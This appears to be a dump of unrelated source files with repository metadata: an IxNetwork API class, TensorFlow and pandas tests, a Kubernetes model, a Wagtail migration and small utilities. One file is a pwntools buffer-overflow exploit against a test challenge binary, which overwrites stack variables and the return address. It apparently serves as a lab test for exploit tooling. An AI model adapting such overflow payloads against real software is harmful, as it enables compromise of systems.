# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class Instructions(Base):
"""The Instructions class encapsulates a required instructions node in the ixnetwork hierarchy.
An instance of the class can be obtained by accessing the Instructions property from a parent instance.
The internal properties list will contain one and only one set of properties which is populated when the property is accessed.
"""
_SDM_NAME = 'instructions'
def __init__(self, parent):
super(Instructions, self).__init__(parent)
@property
def Instruction(self):
"""An instance of the Instruction class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.globals.topology.openflowcontroller.instruction.Instruction)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.globals.topology.openflowcontroller.instruction import Instruction
return Instruction(self)
@property
def Count(self):
"""Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group
Returns:
number
"""
return self._get_attribute('count')
@property
def Description(self):
"""Description of the TLV prototype.
Returns:
str
"""
return self._get_attribute('description')
@Description.setter
def Description(self, value):
self._set_attribute('description', value)
@property
def IsEditable(self):
"""Information on the requirement of the field.
Returns:
bool
"""
return self._get_attribute('isEditable')
@IsEditable.setter
def IsEditable(self, value):
self._set_attribute('isEditable', value)
@property
def IsRepeatable(self):
"""Information if the field can be multiplied in the tlv definition.
Returns:
bool
"""
return self._get_attribute('isRepeatable')
@IsRepeatable.setter
def IsRepeatable(self, value):
self._set_attribute('isRepeatable', value)
@property
def IsRequired(self):
"""Information on the requirement of the field.
Returns:
bool
"""
return self._get_attribute('isRequired')
@IsRequired.setter
def IsRequired(self, value):
self._set_attribute('isRequired', value)
@property
def Name(self):
"""Name of the TLV field.
Returns:
str
"""
return self._get_attribute('name')
@Name.setter
def Name(self, value):
self._set_attribute('name', value)
| [
"[email protected]"
] | |
e2ee40c43a7150a5d6cee96817a5c77f7357f557 | d1a4e71c407c52d28914570c684d2be2f03d1cd2 | /tensorflow/python/keras/layers/preprocessing/text_vectorization_distribution_test.py | 61fb62f7885dec08d19c28211ebc412e7d18f9ed | [
"Apache-2.0"
] | permissive | WindQAQ/tensorflow | f43dd80e1b6004f2443faf2eb310dbcb19ae9796 | 4f4e5f4196e243b33fd218bc9fc910e275b1f22b | refs/heads/master | 2021-07-05T05:55:38.374488 | 2021-03-12T04:51:17 | 2021-03-12T04:51:17 | 190,140,026 | 1 | 0 | Apache-2.0 | 2019-06-04T06:09:54 | 2019-06-04T06:09:53 | null | UTF-8 | Python | false | false | 4,191 | py | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Distribution tests for keras.layers.preprocessing.text_vectorization."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations as ds_combinations
from tensorflow.python.eager import context
from tensorflow.python.framework import config
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_combinations as combinations
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras.distribute.strategy_combinations import all_strategies
from tensorflow.python.keras.layers.preprocessing import preprocessing_test_utils
from tensorflow.python.keras.layers.preprocessing import text_vectorization
from tensorflow.python.keras.layers.preprocessing import text_vectorization_v1
from tensorflow.python.platform import test
def get_layer_class():
if context.executing_eagerly():
return text_vectorization.TextVectorization
else:
return text_vectorization_v1.TextVectorization
@ds_combinations.generate(
combinations.combine(
distribution=all_strategies,
mode=["eager", "graph"]))
class TextVectorizationDistributionTest(
keras_parameterized.TestCase,
preprocessing_test_utils.PreprocessingLayerTest):
def test_distribution_strategy_output(self, distribution):
vocab_data = ["earth", "wind", "and", "fire"]
input_array = np.array([["earth", "wind", "and", "fire"],
["fire", "and", "earth", "michigan"]])
input_dataset = dataset_ops.Dataset.from_tensor_slices(input_array).batch(
2, drop_remainder=True)
expected_output = [[2, 3, 4, 5], [5, 4, 2, 1]]
config.set_soft_device_placement(True)
with distribution.scope():
input_data = keras.Input(shape=(None,), dtype=dtypes.string)
layer = get_layer_class()(
max_tokens=None,
standardize=None,
split=None,
output_mode=text_vectorization.INT)
layer.set_vocabulary(vocab_data)
int_data = layer(input_data)
model = keras.Model(inputs=input_data, outputs=int_data)
output_dataset = model.predict(input_dataset)
self.assertAllEqual(expected_output, output_dataset)
def test_distribution_strategy_output_with_adapt(self, distribution):
vocab_data = [[
"earth", "earth", "earth", "earth", "wind", "wind", "wind", "and",
"and", "fire"
]]
vocab_dataset = dataset_ops.Dataset.from_tensors(vocab_data)
input_array = np.array([["earth", "wind", "and", "fire"],
["fire", "and", "earth", "michigan"]])
input_dataset = dataset_ops.Dataset.from_tensor_slices(input_array).batch(
2, drop_remainder=True)
expected_output = [[2, 3, 4, 5], [5, 4, 2, 1]]
config.set_soft_device_placement(True)
with distribution.scope():
input_data = keras.Input(shape=(None,), dtype=dtypes.string)
layer = get_layer_class()(
max_tokens=None,
standardize=None,
split=None,
output_mode=text_vectorization.INT)
layer.adapt(vocab_dataset)
int_data = layer(input_data)
model = keras.Model(inputs=input_data, outputs=int_data)
output_dataset = model.predict(input_dataset)
self.assertAllEqual(expected_output, output_dataset)
if __name__ == "__main__":
test.main()
| [
"[email protected]"
] | |
fc7c24ed77a547bd786367f500d47a40c1ac668c | bc61b2d61e0d7c119ad40432490a35e49c2af374 | /src/opencmiss/extensions/airwaysmask/utils.py | 418ee6e288308afb4f2d4c8d26af8e38fb44cf52 | [
"Apache-2.0"
] | permissive | hsorby/neon.extension.airwaysmask | 28c2be8d685d9bf72f7704c549bca11c286ce305 | 2d9da30c569e1fcdd0819a6512e570b3d8c9efda | refs/heads/master | 2020-03-27T02:28:06.928298 | 2018-08-29T21:36:27 | 2018-08-29T21:36:27 | 145,792,604 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,007 | py |
def generate_offset_cube_coordinates(dimensions):
"""
Create a set of eight 3D coordinates that are offset by 0.5. In this case the 0.5 is a pixel so that
the centre of the voxel is at the integer coordinate location.
:param dimensions: A list of size three containing the dimensions of the cube.
:return: A list of 3D coordinates for the offset cube.
"""
node_coordinate_set = [[0 - 0.5, 0 - 0.5, 0 - 0.5],
[dimensions[0] + 0.5, 0 - 0.5, 0 - 0.5],
[0 - 0.5, dimensions[1] + 0.5, 0 - 0.5],
[dimensions[0] + 0.5, dimensions[1] + 0.5, 0 - 0.5],
[0 - 0.5, 0 - 0.5, dimensions[2] + 0.5],
[dimensions[0] + 0.5, 0 - 0.5, dimensions[2] + 0.5],
[0 - 0.5, dimensions[1] + 0.5, dimensions[2] + 0.5],
[dimensions[0] + 0.5, dimensions[1] + 0.5, dimensions[2] + 0.5]]
return node_coordinate_set
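# Example (added for illustration): generate_offset_cube_coordinates([2, 2, 2])
# returns the eight corners at -0.5 or dimension + 0.5 on each axis, i.e.
# [[-0.5, -0.5, -0.5], [2.5, -0.5, -0.5], [-0.5, 2.5, -0.5], [2.5, 2.5, -0.5],
#  [-0.5, -0.5, 2.5], [2.5, -0.5, 2.5], [-0.5, 2.5, 2.5], [2.5, 2.5, 2.5]]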
| [
"[email protected]"
] | |
4031eec86fa97d01395a6c182056643b6b8fd372 | 33524b5c049f934ce27fbf046db95799ac003385 | /2017/файлы/write_test.txt | c85aa4e7ccd9f59fca496675eb77169c3c84b5f4 | [] | no_license | mgbo/My_Exercise | 07b5f696d383b3b160262c5978ad645b46244b70 | 53fb175836717493e2c813ecb45c5d5e9d28dd23 | refs/heads/master | 2022-12-24T14:11:02.271443 | 2020-10-04T04:44:38 | 2020-10-04T04:44:38 | 291,413,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | txt | I am currently studying at the MIPT institute.
My name is Mye Maung. I am interested in computer science.
| [
"[email protected]"
] | |
894fb7bca92442fa7ede87e3eb4fb9460d48dac3 | 077a17b286bdd6c427c325f196eb6e16b30c257e | /00_BofVar-unit-tests/05_64/remenissions-work/exploit-BofFunc-55.py | aaa5881a3250fe6ea97d12a84f892bc0bf2bb8f1 | [] | no_license | KurSh/remenissions_test | 626daf6e923459b44b82521aa4cb944aad0dbced | 9dec8085b62a446f7562adfeccf70f8bfcdbb738 | refs/heads/master | 2023-07-08T20:25:04.823318 | 2020-10-05T06:45:16 | 2020-10-05T06:45:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 918 | py | from pwn import *
import time
import sys
import signal
import sf
target = process("./chall-test_BofVar-05-x64")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=64)
bof_payload.set_input_start(0x58)
bof_payload.add_int32(0x20, 0xdead)
bof_payload.add_int32(0x1c, 0xbef1)
bof_payload.add_int32(0x18, 0xfacadf)
bof_payload.add_int32(0x14, 0xbeef)
bof_payload.add_int32(0x10, 0xfacade)
bof_payload.add_int32(0xc, 0xdeae)
bof_payload.set_ret(0x400537)
payload = bof_payload.generate_payload()
target.sendline(payload)
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
def check_verification_done():
while True:
if os.path.exists("pwned") or os.path.exists("rip"):
sys.exit(0)
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
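# (added note) SIGALRM fires after 2 seconds; handler() then raises inside the
# busy-wait below, and the except block reports the timeout.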
try:
while True:
check_verification_done()
except Exception:
print("Exploit timed out")
| [
"[email protected]"
] | |
c2f713bbc9cad80955d03476244f66543e606652 | 16047f965a69893a8cd2c8d18fbd7b9c86a07eb3 | /src/kubernetes/client/models/v1beta1_role.py | 2c1a21b5a2042eac6ef9b08e9bd6650f618215a2 | [
"Apache-2.0",
"LicenseRef-scancode-proprietary-license",
"MIT"
] | permissive | guctum/aws-kube-codesuite | 9ce2cc02fe5fa15c2e175fb697138014fb162f1e | 5d62beaadc13bec745ac7d2fc18f07805e91cef3 | refs/heads/master | 2021-05-24T10:08:00.651840 | 2020-04-23T20:21:46 | 2020-04-23T20:21:46 | 253,511,083 | 0 | 0 | Apache-2.0 | 2020-04-06T13:48:14 | 2020-04-06T13:48:13 | null | UTF-8 | Python | false | false | 6,072 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.7.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta1Role(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, api_version=None, kind=None, metadata=None, rules=None):
"""
V1beta1Role - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'api_version': 'str',
'kind': 'str',
'metadata': 'V1ObjectMeta',
'rules': 'list[V1beta1PolicyRule]'
}
self.attribute_map = {
'api_version': 'apiVersion',
'kind': 'kind',
'metadata': 'metadata',
'rules': 'rules'
}
self._api_version = api_version
self._kind = kind
self._metadata = metadata
self._rules = rules
@property
def api_version(self):
"""
Gets the api_version of this V1beta1Role.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:return: The api_version of this V1beta1Role.
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""
Sets the api_version of this V1beta1Role.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:param api_version: The api_version of this V1beta1Role.
:type: str
"""
self._api_version = api_version
@property
def kind(self):
"""
Gets the kind of this V1beta1Role.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:return: The kind of this V1beta1Role.
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""
Sets the kind of this V1beta1Role.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param kind: The kind of this V1beta1Role.
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""
Gets the metadata of this V1beta1Role.
Standard object's metadata.
:return: The metadata of this V1beta1Role.
:rtype: V1ObjectMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""
Sets the metadata of this V1beta1Role.
Standard object's metadata.
:param metadata: The metadata of this V1beta1Role.
:type: V1ObjectMeta
"""
self._metadata = metadata
@property
def rules(self):
"""
Gets the rules of this V1beta1Role.
Rules holds all the PolicyRules for this Role
:return: The rules of this V1beta1Role.
:rtype: list[V1beta1PolicyRule]
"""
return self._rules
@rules.setter
def rules(self, rules):
"""
Sets the rules of this V1beta1Role.
Rules holds all the PolicyRules for this Role
:param rules: The rules of this V1beta1Role.
:type: list[V1beta1PolicyRule]
"""
if rules is None:
raise ValueError("Invalid value for `rules`, must not be `None`")
self._rules = rules
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta1Role):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"[email protected]"
] | |
ed0430a62d28f4125e637ff3312f7676ec05f87e | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_247/ch7_2020_09_02_20_17_45_778734.py | bb2bde7727968a017b1f9750c6aa7f2d2bd26672 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py | def calcula_area_do_triangulo (b, h):
    y = (b * h) / 2
return y
| [
"[email protected]"
] | |
5ef75da1022655c5bd6ac835508068ef14abd034 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_fountains.py | 8f3662dc38b64b11ddca5e07e700a81c35dac24f | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py |
#class header
class _FOUNTAINS():
def __init__(self,):
self.name = "FOUNTAINS"
self.definitions = fountain
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['fountain']
| [
"[email protected]"
] | |
73eac1e22433ab4eea9aca1376ba592b36c8a766 | b162de01d1ca9a8a2a720e877961a3c85c9a1c1c | /19.remove-nth-node-from-end-of-list.python3.py | 3b4c3c3f89c9d6b3ace1f623eb8f445776978c96 | [] | no_license | richnakasato/lc | 91d5ff40a1a3970856c76c1a53d7b21d88a3429c | f55a2decefcf075914ead4d9649d514209d17a34 | refs/heads/master | 2023-01-19T09:55:08.040324 | 2020-11-19T03:13:51 | 2020-11-19T03:13:51 | 114,937,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 900 | py | #
# [19] Remove Nth Node From End of List
#
# https://leetcode.com/problems/remove-nth-node-from-end-of-list/description/
#
# algorithms
# Medium (33.66%)
# Total Accepted: 320.9K
# Total Submissions: 953.4K
# Testcase Example: '[1,2,3,4,5]\n2'
#
# Given a linked list, remove the n-th node from the end of list and return its
# head.
#
# Example:
#
#
# Given linked list: 1->2->3->4->5, and n = 2.
#
# After removing the second node from the end, the linked list becomes
# 1->2->3->5.
#
#
# Note:
#
# Given n will always be valid.
#
# Follow up:
#
# Could you do this in one pass?
#
#
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def removeNthFromEnd(self, head, n):
"""
:type head: ListNode
:type n: int
:rtype: ListNode
"""
| [
"[email protected]"
] | |
2480aceae6ae2ba2e2a15b9c72c5bc82b9962eb7 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02939/s369857416.py | 52d015695e7208d99d4fc5b060a39a9e61059cf9 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | S = input()
ans = 0
x = ''
y = ''
for i in S:
x += i
if x == y:
pass
else:
ans += 1
y = x
x = ''
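# Worked example (added): for S = "aabbaa" the counted pieces are "a", "ab",
# "b", "a"; the final character would repeat the previous piece, so it is not
# counted and the program prints 4.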
print(ans) | [
"[email protected]"
] | |
245197b0595c935756ec65fe267b78539b1a40ca | 7a88fc18f30d5dd3ac935877d4d9268a56c296be | /di_website/vacancies/migrations/0014_auto_20190814_1527.py | d83551c3c570dff4336656f37419b42c8c1ef8cb | [] | no_license | devinit/DIwebsite-redesign | 745a480b7ba0feffa34dc664548ee4c5a7b4d470 | 9ec46823c67cdd4f35be255896bf30d8f6362666 | refs/heads/develop | 2023-08-30T04:06:20.951203 | 2023-08-07T12:06:07 | 2023-08-07T12:06:07 | 184,287,370 | 1 | 0 | null | 2023-08-28T14:34:57 | 2019-04-30T15:29:25 | HTML | UTF-8 | Python | false | false | 3,075 | py | # Generated by Django 2.2.2 on 2019-08-14 15:27
from django.db import migrations
import wagtail.blocks
import wagtail.fields
import wagtail.documents.blocks
import wagtail.embeds.blocks
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('vacancies', '0013_auto_20190813_1221'),
]
operations = [
migrations.AlterField(
model_name='vacancypage',
name='body',
field=wagtail.fields.StreamField([('paragraph_block', wagtail.blocks.RichTextBlock(features=['h2', 'h3', 'h4', 'bold', 'italic', 'ol', 'ul', 'link', 'document', 'image', 'embed'], icon='fa-paragraph', template='blocks/paragraph_block.html')), ('section_paragraph_block', wagtail.blocks.StructBlock([('text', wagtail.blocks.RichTextBlock(features=['h2', 'h3', 'h4', 'bold', 'italic', 'ol', 'ul', 'link', 'document', 'image', 'embed'])), ('center', wagtail.blocks.BooleanBlock(default=False, required=False))])), ('block_quote', wagtail.blocks.StructBlock([('text', wagtail.blocks.TextBlock())])), ('section_block_quote', wagtail.blocks.StructBlock([('text', wagtail.blocks.TextBlock()), ('center', wagtail.blocks.BooleanBlock(default=False, required=False))])), ('banner_block', wagtail.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock(required=False)), ('video', wagtail.embeds.blocks.EmbedBlock(help_text='Insert an embed URL e.g https://www.youtube.com/embed/SGJFWirQ3ks', icon='fa-s15', required=False, template='blocks/embed_block.html')), ('text', wagtail.blocks.StreamBlock([('text', wagtail.blocks.TextBlock(template='blocks/banner/text.html')), ('list', wagtail.blocks.ListBlock(wagtail.blocks.StructBlock([('title', wagtail.blocks.TextBlock()), ('content', wagtail.blocks.TextBlock(required=False))], template='blocks/banner/list_item.html'), template='blocks/banner/list.html'))])), ('meta', wagtail.blocks.CharBlock(help_text='Anything from a name, location e.t.c - usually to provide credit for the text', required=False)), ('buttons', wagtail.blocks.StreamBlock([('button', wagtail.blocks.StructBlock([('caption', wagtail.blocks.CharBlock(required=False)), ('url', wagtail.blocks.URLBlock(required=False)), ('page', wagtail.blocks.PageChooserBlock(required=False))])), ('document_box', wagtail.blocks.StructBlock([('document_box_heading', wagtail.blocks.CharBlock(icon='title', required=False)), ('documents', wagtail.blocks.StreamBlock([('document', wagtail.documents.blocks.DocumentChooserBlock())], required=False)), ('dark_mode', wagtail.blocks.BooleanBlock(default=False, help_text='Red on white if unchecked. White on dark grey if checked.', required=False))]))], required=False)), ('media_orientation', wagtail.blocks.ChoiceBlock(choices=[('left', 'Left'), ('right', 'Right')], required=False))])), ('button', wagtail.blocks.StructBlock([('caption', wagtail.blocks.CharBlock(required=False)), ('url', wagtail.blocks.URLBlock(required=False)), ('page', wagtail.blocks.PageChooserBlock(required=False))]))], blank=True, null=True, verbose_name='Page Body'),
),
]
| [
"[email protected]"
] | |
ec0cfcecd31f2c6a246a73248820c3d252ee9f33 | 170864b6ec66be48138f231fe8ac3381481b8c9d | /python/BOJ_5585.py | 13ea463165f2037fccae553ad628352c08812824 | [] | no_license | hyesungoh/AA_Algorithm | 5da3d8312d035d324dfaa31eef73f01a238231f3 | d68f52eaa29cfc4656a8b5623359166779ded06e | refs/heads/master | 2023-06-09T14:49:01.402456 | 2021-06-28T10:10:09 | 2021-06-28T10:10:09 | 272,701,231 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 144 | py | n = 1000 - int(input())
coins = [500, 100, 50, 10, 5, 1]
ans = 0
for coin in coins:
t = n // coin
n -= t * coin
ans += t
print(ans)
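# Worked example (added): for input 380 the change is 1000 - 380 = 620,
# which the greedy split covers as 1*500 + 1*100 + 2*10, so it prints 4.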
| [
"[email protected]"
] | |
80891c064ba70a74469236ea3fa95287ff894762 | 209a7a4023a9a79693ec1f6e8045646496d1ea71 | /COMP0016_2020_21_Team12-datasetsExperimentsAna/pwa/FADapp/pythonScripts/venv/Lib/site-packages/pandas/tests/config/test_config.py | 1a7bfb879e6967e2864e3b5cbfb441f9debef077 | [
"MIT"
] | permissive | anzhao920/MicrosoftProject15_Invictus | 5e2347015411bbffbdf0ceb059df854661fb240c | 15f44eebb09561acbbe7b6730dfadf141e4c166d | refs/heads/main | 2023-04-16T13:24:39.332492 | 2021-04-27T00:47:13 | 2021-04-27T00:47:13 | 361,913,170 | 0 | 0 | MIT | 2021-04-26T22:41:56 | 2021-04-26T22:41:55 | null | UTF-8 | Python | false | false | 18,734 | py | import warnings
import pytest
from pandas._config import config as cf
from pandas._config.config import OptionError
import pandas as pd
class TestConfig:
@classmethod
def setup_class(cls):
from copy import deepcopy
cls.cf = cf
cls.gc = deepcopy(getattr(cls.cf, "_global_config"))
cls.do = deepcopy(getattr(cls.cf, "_deprecated_options"))
cls.ro = deepcopy(getattr(cls.cf, "_registered_options"))
def setup_method(self, method):
setattr(self.cf, "_global_config", {})
setattr(self.cf, "options", self.cf.DictWrapper(self.cf._global_config))
setattr(self.cf, "_deprecated_options", {})
setattr(self.cf, "_registered_options", {})
# Our test fixture in conftest.py sets "chained_assignment"
# to "raise" only after all test methods have been setup.
# However, after this setup, there is no longer any
# "chained_assignment" option, so re-register it.
self.cf.register_option("chained_assignment", "raise")
def teardown_method(self, method):
setattr(self.cf, "_global_config", self.gc)
setattr(self.cf, "_deprecated_options", self.do)
setattr(self.cf, "_registered_options", self.ro)
def test_api(self):
# the pandas object exposes the user API
assert hasattr(pd, "get_option")
assert hasattr(pd, "set_option")
assert hasattr(pd, "reset_option")
assert hasattr(pd, "describe_option")
def test_is_one_of_factory(self):
v = self.cf.is_one_of_factory([None, 12])
v(12)
v(None)
msg = r"Value must be one of None\|12"
with pytest.raises(ValueError, match=msg):
v(1.1)
def test_register_option(self):
self.cf.register_option("a", 1, "doc")
# can't register an already registered option
msg = "Option 'a' has already been registered"
with pytest.raises(OptionError, match=msg):
self.cf.register_option("a", 1, "doc")
# can't register an already registered option
msg = "Path prefix to option 'a' is already an option"
with pytest.raises(OptionError, match=msg):
self.cf.register_option("a.b.c.d1", 1, "doc")
with pytest.raises(OptionError, match=msg):
self.cf.register_option("a.b.c.d2", 1, "doc")
# no python keywords
msg = "for is a python keyword"
with pytest.raises(ValueError, match=msg):
self.cf.register_option("for", 0)
with pytest.raises(ValueError, match=msg):
self.cf.register_option("a.for.b", 0)
# must be valid identifier (ensure attribute access works)
msg = "oh my goddess! is not a valid identifier"
with pytest.raises(ValueError, match=msg):
self.cf.register_option("Oh my Goddess!", 0)
# we can register options several levels deep
# without predefining the intermediate steps
# and we can define differently named options
# in the same namespace
self.cf.register_option("k.b.c.d1", 1, "doc")
self.cf.register_option("k.b.c.d2", 1, "doc")
def test_describe_option(self):
self.cf.register_option("a", 1, "doc")
self.cf.register_option("b", 1, "doc2")
self.cf.deprecate_option("b")
self.cf.register_option("c.d.e1", 1, "doc3")
self.cf.register_option("c.d.e2", 1, "doc4")
self.cf.register_option("f", 1)
self.cf.register_option("g.h", 1)
self.cf.register_option("k", 2)
self.cf.deprecate_option("g.h", rkey="k")
self.cf.register_option("l", "foo")
# non-existent keys raise KeyError
msg = r"No such keys\(s\)"
with pytest.raises(OptionError, match=msg):
self.cf.describe_option("no.such.key")
# we can get the description for any key we registered
assert "doc" in self.cf.describe_option("a", _print_desc=False)
assert "doc2" in self.cf.describe_option("b", _print_desc=False)
assert "precated" in self.cf.describe_option("b", _print_desc=False)
assert "doc3" in self.cf.describe_option("c.d.e1", _print_desc=False)
assert "doc4" in self.cf.describe_option("c.d.e2", _print_desc=False)
# if no doc is specified we get a default message
# saying "description not available"
assert "vailable" in self.cf.describe_option("f", _print_desc=False)
assert "vailable" in self.cf.describe_option("g.h", _print_desc=False)
assert "precated" in self.cf.describe_option("g.h", _print_desc=False)
assert "k" in self.cf.describe_option("g.h", _print_desc=False)
# default is reported
assert "foo" in self.cf.describe_option("l", _print_desc=False)
# current value is reported
assert "bar" not in self.cf.describe_option("l", _print_desc=False)
self.cf.set_option("l", "bar")
assert "bar" in self.cf.describe_option("l", _print_desc=False)
def test_case_insensitive(self):
self.cf.register_option("KanBAN", 1, "doc")
assert "doc" in self.cf.describe_option("kanbaN", _print_desc=False)
assert self.cf.get_option("kanBaN") == 1
self.cf.set_option("KanBan", 2)
assert self.cf.get_option("kAnBaN") == 2
# gets of non-existent keys fail
msg = r"No such keys\(s\): 'no_such_option'"
with pytest.raises(OptionError, match=msg):
self.cf.get_option("no_such_option")
self.cf.deprecate_option("KanBan")
assert self.cf._is_deprecated("kAnBaN")
def test_get_option(self):
self.cf.register_option("a", 1, "doc")
self.cf.register_option("b.c", "hullo", "doc2")
self.cf.register_option("b.b", None, "doc2")
# gets of existing keys succeed
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b.c") == "hullo"
assert self.cf.get_option("b.b") is None
# gets of non-existent keys fail
msg = r"No such keys\(s\): 'no_such_option'"
with pytest.raises(OptionError, match=msg):
self.cf.get_option("no_such_option")
def test_set_option(self):
self.cf.register_option("a", 1, "doc")
self.cf.register_option("b.c", "hullo", "doc2")
self.cf.register_option("b.b", None, "doc2")
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b.c") == "hullo"
assert self.cf.get_option("b.b") is None
self.cf.set_option("a", 2)
self.cf.set_option("b.c", "wurld")
self.cf.set_option("b.b", 1.1)
assert self.cf.get_option("a") == 2
assert self.cf.get_option("b.c") == "wurld"
assert self.cf.get_option("b.b") == 1.1
msg = r"No such keys\(s\): 'no.such.key'"
with pytest.raises(OptionError, match=msg):
self.cf.set_option("no.such.key", None)
def test_set_option_empty_args(self):
msg = "Must provide an even number of non-keyword arguments"
with pytest.raises(ValueError, match=msg):
self.cf.set_option()
def test_set_option_uneven_args(self):
msg = "Must provide an even number of non-keyword arguments"
with pytest.raises(ValueError, match=msg):
self.cf.set_option("a.b", 2, "b.c")
def test_set_option_invalid_single_argument_type(self):
msg = "Must provide an even number of non-keyword arguments"
with pytest.raises(ValueError, match=msg):
self.cf.set_option(2)
def test_set_option_multiple(self):
self.cf.register_option("a", 1, "doc")
self.cf.register_option("b.c", "hullo", "doc2")
self.cf.register_option("b.b", None, "doc2")
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b.c") == "hullo"
assert self.cf.get_option("b.b") is None
self.cf.set_option("a", "2", "b.c", None, "b.b", 10.0)
assert self.cf.get_option("a") == "2"
assert self.cf.get_option("b.c") is None
assert self.cf.get_option("b.b") == 10.0
def test_validation(self):
self.cf.register_option("a", 1, "doc", validator=self.cf.is_int)
self.cf.register_option("d", 1, "doc", validator=self.cf.is_nonnegative_int)
self.cf.register_option("b.c", "hullo", "doc2", validator=self.cf.is_text)
msg = "Value must have type '<class 'int'>'"
with pytest.raises(ValueError, match=msg):
self.cf.register_option("a.b.c.d2", "NO", "doc", validator=self.cf.is_int)
self.cf.set_option("a", 2) # int is_int
self.cf.set_option("b.c", "wurld") # str is_str
self.cf.set_option("d", 2)
self.cf.set_option("d", None) # non-negative int can be None
# None not is_int
with pytest.raises(ValueError, match=msg):
self.cf.set_option("a", None)
with pytest.raises(ValueError, match=msg):
